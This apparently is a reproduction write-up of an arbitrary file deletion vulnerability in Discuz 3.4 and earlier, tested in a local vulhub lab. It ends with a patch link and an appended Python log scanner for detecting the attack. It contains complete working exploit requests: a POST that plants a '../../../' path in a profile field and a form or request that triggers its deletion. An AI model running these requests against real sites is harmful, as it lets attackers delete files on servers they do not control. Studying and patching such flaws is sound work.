Preface: On September 29, Discuz fixed a front-end arbitrary file deletion vulnerability (reachable from the ordinary user side, without admin access). A similar vulnerability was reported to WooYun and to the Discuz developers in 2014, but the incomplete fix led to this one. Many sources online say the official 3.4 release has already been fixed, but the environment I used is the 3.4 version from vulhub, so without knowing whether 3.4 is patched or not, I simply reproduce it directly.

Affected versions: Discuz <= 3.4

Environment: (screenshot)
Reproduction steps: First create a file named test.txt in the Discuz directory; it will be the file deleted later.

(Screenshot: creating test.txt)

Visit http://192.168.220.131/home.php?mod=spacecp, open the browser's element inspector, find the value of formhash, and copy it.
(Screenshot: viewing formhash)

Capture the request with Burp to obtain the cookie.
(Screenshot: captured cookie)

Send the following request, replacing the cookie, the formhash, and the file to be deleted:
POST /home.php?mod=spacecp&ac=profile&op=base HTTP/1.1
Host: localhost
Content-Length: 367
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryPFvXyxL45f34L12s
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,en;q=0.6
Cookie: CmcL_2132_saltkey=b9yKqToA; CmcL_2132_lastvisit=1577934646; CmcL_2132_sid=I21Fam; CmcL_2132_lastact=1577951222%09misc.php%09patch; CmcL_2132__refer=%252Fhome.php%253Fmod%253Dspacecp; CmcL_2132_seccode=1.1f5dbc9f8f51267031; CmcL_2132_ulastactivity=f7c74D32skNeZM0YcFOOaQUi7XmBcai6jjji8MGC7px2%2BTiSN9qM; CmcL_2132_auth=8bf5qD72m1LL4vx%2BXQAGHjNEfio4ELQqrhkkrwz%2FdcuiSxXlRhnYfpwxloZj5lqVp6zUrThf%2FVYOcWS9xQwm; CmcL_2132_lastcheckfeed=2%7C1577938266; CmcL_2132_lip=192.168.220.1%2C1577938056
Connection: close

------WebKitFormBoundaryPFvXyxL45f34L12s
Content-Disposition: form-data; name="formhash"

84a7f376
------WebKitFormBoundaryPFvXyxL45f34L12s
Content-Disposition: form-data; name="birthprovince"

../../../test.txt
------WebKitFormBoundaryPFvXyxL45f34L12s
Content-Disposition: form-data; name="profilesubmit"

1
------WebKitFormBoundaryPFvXyxL45f34L12s--
(Screenshot: sending the request that stores the path)

Refresh the page; the birthplace field will now show the state in the screenshot below:

(Screenshot: data written successfully)
This shows that the data has entered the database:

Next, create an upload.html with the following code, changing the IP to the Discuz host and [form-hash] to your own formhash:
<form action="http://192.168.220.131/home.php?mod=spacecp&ac=profile&op=base&deletefile[birthprovince]=aaaaaa" method="POST" enctype="multipart/form-data">
<input type="file" name="birthprovince" id="file" />
<input type="text" name="formhash" value="84a7f376" />
<input type="text" name="profilesubmit" value="1" />
<input type="submit" value="Submit" />
</form>
Or construct the request directly:
POST /home.php?mod=spacecp&ac=profile&op=base&profilesubmit=1&formhash=84a7f376 HTTP/1.1
Host: 192.168.220.131
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------123821742118716
Content-Length: 91989
Connection: close
Cookie: CmcL_2132_saltkey=b9yKqToA; CmcL_2132_lastvisit=1577934646; CmcL_2132_sid=I21Fam; CmcL_2132_lastact=1577951222%09misc.php%09patch; CmcL_2132__refer=%252Fhome.php%253Fmod%253Dspacecp; CmcL_2132_seccode=1.1f5dbc9f8f51267031; CmcL_2132_ulastactivity=f7c74D32skNeZM0YcFOOaQUi7XmBcai6jjji8MGC7px2%2BTiSN9qM; CmcL_2132_auth=8bf5qD72m1LL4vx%2BXQAGHjNEfio4ELQqrhkkrwz%2FdcuiSxXlRhnYfpwxloZj5lqVp6zUrThf%2FVYOcWS9xQwm; CmcL_2132_lastcheckfeed=2%7C1577938266; CmcL_2132_lip=192.168.220.1%2C1577938056
Upgrade-Insecure-Requests: 1

-----------------------------123821742118716
Content-Disposition: form-data; name="birthprovince"; filename="0.jpg"
Content-Type: image/jpeg

zerba (anything can be written here)
-----------------------------123821742118716--
Go back into the Discuz directory and you can see that test.txt has been deleted.
Fix suggestion: https://gitee.com/ComsenzDiscuz/DiscuzX/commit/7d603a197c2717ef1d7e9ba654cf72aa42d3e574

Edit the file upload/source/include/spacecp/spacecp_profile.php and remove the unlink-related code.
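As an added defensive example (not code from the original post or from Discuz): the deletion request above is recognisable by a deletefile[...] parameter on home.php?mod=spacecp&ac=profile, and the stored birthprovince value is recognisable by its path traversal. The Python below flags such requests in constructed access-log lines and checks whether a stored profile value would escape its directory if passed to unlink; the log format and the sample lines are assumptions, not taken from the post.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed sample access-log lines (combined log format, not from the original post).
SAMPLE_LOG = """\
192.168.220.1 - - [02/Jan/2020:10:01:02 +0800] "GET /home.php?mod=spacecp HTTP/1.1" 200 5123
192.168.220.1 - - [02/Jan/2020:10:01:30 +0800] "POST /home.php?mod=spacecp&ac=profile&op=base HTTP/1.1" 200 811
192.168.220.1 - - [02/Jan/2020:10:02:15 +0800] "POST /home.php?mod=spacecp&ac=profile&op=base&deletefile[birthprovince]=aaaaaa HTTP/1.1" 200 811
192.168.220.1 - - [02/Jan/2020:10:02:40 +0800] "POST /home.php?mod=spacecp&ac=profile&op=base&profilesubmit=1&formhash=84a7f376 HTTP/1.1" 200 802
"""

# ip, timestamp, method, request target and status from one log line
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d+)'
)
# a ".." path component, with either slash style, at any position in the value
TRAVERSAL_RE = re.compile(r'(^|[\\/])\.\.([\\/]|$)')


def is_profile_delete_request(target):
    """True if the request hits the spacecp profile page with a deletefile[...] key."""
    parts = urlsplit(target)
    if parts.path != "/home.php":
        return False
    qs = parse_qs(parts.query, keep_blank_values=True)
    if qs.get("mod") != ["spacecp"] or qs.get("ac") != ["profile"]:
        return False
    return any(key.startswith("deletefile[") for key in qs)


def has_traversal(value):
    """True if a stored profile field value (possibly URL-encoded) contains a '..' component,
    i.e. it would point outside the profile attachment directory if unlinked."""
    return bool(TRAVERSAL_RE.search(unquote(value)))


def find_suspicious(log_text):
    """Return (ip, timestamp, target) for every log line that looks like the deletion trigger."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if m and is_profile_delete_request(m.group("target")):
            hits.append((m.group("ip"), m.group("ts"), m.group("target")))
    return hits


if __name__ == "__main__":
    for ip, ts, target in find_suspicious(SAMPLE_LOG):
        print(f"{ts} {ip} deletefile request: {target}")
```

Running has_traversal over the birthprovince column of the stored profiles is a quick way to find accounts that already hold a traversal value before the patch is applied.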